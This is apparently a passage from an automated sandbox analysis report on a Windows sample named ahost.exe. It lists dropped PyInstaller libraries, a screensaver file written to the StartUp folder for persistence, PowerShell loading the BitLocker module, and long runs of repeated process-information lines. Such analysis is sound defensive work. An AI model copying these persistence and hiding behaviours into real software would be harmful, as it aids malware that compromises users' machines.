Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\sqlite3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\_ctypes.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\ahost.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Jump to behavior

Source: C:\Users\user\Desktop\ahost.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\ahost.exe

Code function: 0_2_00007FF7F91E76B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF7F91E76B0

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
